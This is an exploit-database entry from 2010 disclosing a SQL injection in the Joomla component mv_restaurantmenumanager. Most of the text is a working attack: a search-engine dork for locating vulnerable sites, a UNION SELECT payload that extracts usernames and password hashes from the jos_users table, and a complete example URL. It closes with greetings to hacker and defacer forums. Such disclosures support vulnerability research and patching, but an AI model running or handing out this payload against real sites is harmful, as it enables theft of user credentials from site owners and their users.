Joomla! Component mv_restaurantmenumanager - SQL Injection

EDB-ID:

12162

CVE:

N/A


Platform:

PHP

Published:

2010-04-11

=========================================================
Joomla component mv_restaurantmenumanager SQL injection Vulnerability
=========================================================

# Exploit Title     : joomla component mv_restaurantmenumanager SQL injection Vulnerability
# Date              : 12 april 2010
# Author            : Sudden_death (suddendeath404@yahoo.com)
# Software Link     : N/A
# Tested on         : Windows XP 2
# Platform/Tested on: Windows XP 2 SP 2
# category          : webapps/0day
# myweb             : http://suddendeath.000space.com/
# dork              : inurl:option=com_mv_restaurantmenumanager
# Code                 :+and+1=2+union+select+1,2,group_concat(username,0x3a,password),4,5,6,7,8,9,10,11,12+from+jos_users

======================================================================

# EXPLOIT / c0de

+and+1=2+union+select+1,2,group_concat(username,0x3a,password),4,5,6,7,8,9,10,11,12+from+jos_users


# VULN IN HERE

http://localhost/joomla/index.php?option=com_mv_restaurantmenumanager&task=menu_display&Venue=1&mid=5[c0de<http://localhost/joomla/index.php?option=com_mv_restaurantmenumanager&task=menu_display&Venue=1&mid=5%5Bc0de>}



# EXAMPLE

http://localhost/joomla/index.php?option=com_mv_restaurantmenumanager&task=menu_display&Venue=1&mid=5+and+1=2+union+select+1,2,group_concat(username,0x3a,password),4,5,6,7,8,9,10,11,12+from+jos_users<http://localhost/joomla/index.php?option=com_mv_restaurantmenumanager&task=menu_display&Venue=1&mid=5+and+1=2+union+select+1,2,group_concat%28username,0x3a,password%29,4,5,6,7,8,9,10,11,12+from+jos_users>


[#]-------------------------------------------------------------------

GREETZ TO WE FORUM:
[ indonesianhacker[dot]com | indonesiandefacer[dot]org ]

[#]-------------------------------------------------------------------

MY BROTHA :
| MISTERFRIBO | BobyPutrA | Syst3m_RtO | bumble_be | CS-31 | d43ngCyb3r | Ichito-Bandito | james0baster |
| kaMtiEz | Man In Black | otong | r3m1ck's | shadowsmaker | SyNTaX ErRoR | iJoo | FLYFF666 | LOL1ds |
| cah_surip | demnas | RXn7 | and all crew indonesia hacker :D |

[#]-------------------------------------------------------------------

note :jangan mengatakan setiap apa yang engkau ketahui tapi ketahuilah setiap apa yang kau katakan!